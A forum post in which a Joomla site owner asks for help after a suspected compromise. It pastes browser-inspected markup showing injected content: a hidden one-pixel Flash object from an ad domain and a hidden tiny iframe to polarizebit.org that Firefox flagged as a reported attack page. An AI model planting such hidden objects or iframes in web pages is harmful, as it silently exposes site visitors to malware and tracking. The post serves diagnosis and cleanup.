I do have one site that I have been working on and had not backed up yet (stupid, I know). I uploaded a clean htaccess file so I don't think the code is in there. So I will probably have to rebuild it from scratch. So I did a fresh installation of Joomla 2.5.7 with a new database in a new folder, and I noticed a strange thing. At the very top of the browser there a some small black squares right above the admin panel on the back end and at the top of the page on the front end. When I use firebug, I see the following, and it just doesn't seem right. . This is a new install without sample data.
Code: Select all
[size=85][size=85]!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-gb" dir="ltr" xml:lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" slick-uniqueid="3">
<head>
<body style="font-size: 100%;">
<div id="_GPL_e6a00_parent_div" style="position: absolute; top: 0px; left: 0px; width: 1px; height: 1px; z-index: 2147483647;">
<object id="_GPL_e6a00_swf" width="1" height="1" type="application/x-shockwave-flash" data="http://savingsslider-a.akamaihd.net/items/e6a00/storage.swf">
<param name="wmode" value="transparent">
<param name="allowscriptaccess" value="always">
<param name="flashvars" value="logfn=_GPL.items.e6a00.log&onload=_GPL.items.e6a00.onload&onerror=_GPL.items.e6a00.onerror&LSOName=gpl">
</object>
</div>
<iframe width="5" scrolling="auto" height="5" align="middle" frameborder="no" src="http://polarizebit.org/Lexmark?8">
<!DOCTYPE html>
<html class="blacklist" xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" href="chrome://global/skin/netError.css" type="text/css" media="all">
Filtered chrome url chrome://global/skin/netError.css
</link>
<link id="favicon" rel="icon" type="image/png" href="chrome://global/skin/icons/blacklist_favicon.png"/>
<script type="application/javascript">
// Error url MUST be formatted like this:
// about:blocked?e=error_code&u=url
// Note that this file uses document.documentURI to get
// the URL (with the format from above). This is because
// document.location.href gets the current URI off the docshell,
// which is the URL displayed in the location bar, i.e.
// the URI that the user attempted to load.
function getErrorCode()
{
var url = document.documentURI;
var error = url.search(/e\=/);
var duffUrl = url.search(/\&u\=/);
return decodeURIComponent(url.slice(error + 2, duffUrl));
}
function getURL()
{
var url = document.documentURI;
var match = url.match(/&u=([^&]+)&/);
// match == null if not found; if so, return an empty string
// instead of what would turn out to be portions of the URI
if (!match)
return "";
url = decodeURIComponent(match[1]);
// If this is a view-source page, then get then real URI of the page
if (/^view-source\:/.test(url))
url = url.slice(12);
return url;
}
/**
* Attempt to get the hostname via document.location. Fail back
* to getURL so that we always return something meaningful.
*/
function getHostString()
{
try {
return document.location.hostname;
} catch (e) {
return getURL();
}
}
function initPage()
{
// Handoff to the appropriate initializer, based on error code
switch (getErrorCode()) {
case "malwareBlocked" :
initPage_malware();
break;
case "phishingBlocked" :
initPage_phishing();
break;
}
}
/**
* Initialize custom strings and functionality for blocked malware case
*/
function initPage_malware()
{
// Remove phishing strings
var el = document.getElementById("errorTitleText_phishing");
el.parentNode.removeChild(el);
el = document.getElementById("errorShortDescText_phishing");
el.parentNode.removeChild(el);
el = document.getElementById("errorLongDescText_phishing");
el.parentNode.removeChild(el);
// Set sitename
document.getElementById("malware_sitename").textContent = getHostString();
document.title = document.getElementById("errorTitleText_malware")
.innerHTML;
}
/**
* Initialize custom strings and functionality for blocked phishing case
*/
function initPage_phishing()
{
// Remove malware strings
var el = document.getElementById("errorTitleText_malware");
el.parentNode.removeChild(el);
el = document.getElementById("errorShortDescText_malware");
el.parentNode.removeChild(el);
el = document.getElementById("errorLongDescText_malware");
el.parentNode.removeChild(el);
// Set sitename
document.getElementById("phishing_sitename").textContent = getHostString();
document.title = document.getElementById("errorTitleText_phishing")
.innerHTML;
}
</script>
<style type="text/css">
/* Style warning button to look like a small text link in the
bottom right. This is preferable to just using a text link
since there is already a mechanism in browser.js for trapping
oncommand events from unprivileged chrome pages (BrowserOnCommand).*/
#ignoreWarningButton {
-moz-appearance: none;
background: transparent;
border: none;
color: white; /* Hard coded because netError.css forces this page's background to dark red */
text-decoration: underline;
margin: 0;
padding: 0;
position: relative;
top: 23px;
left: 20px;
font-size: smaller;
}
#ignoreWarning {
text-align: right;
}
</style>
<title>Reported Attack Page!</title>
</head>
<body dir="ltr">
<div id="errorPageContainer">
<div id="errorTitle">
<h1 id="errorTitleText_malware">Reported Attack Page!</h1>
</div>
<div id="errorLongContent">
<div id="errorShortDesc">
<div id="errorLongDesc">
<div id="buttons">
</div>
<div id="ignoreWarning">
</div>
<script type="application/javascript">
</body>
</html>
</iframe>[/size][/size]
Is this normal? Do you think it is related to the redirect? Where is it coming from?How can I fix this?
The new install is http://s285641334.onlinehome.us/olio2/
The site that redirects to msn.com is http://s285641334.onlinehome.us/olio/
Someone please help!!!
Ellen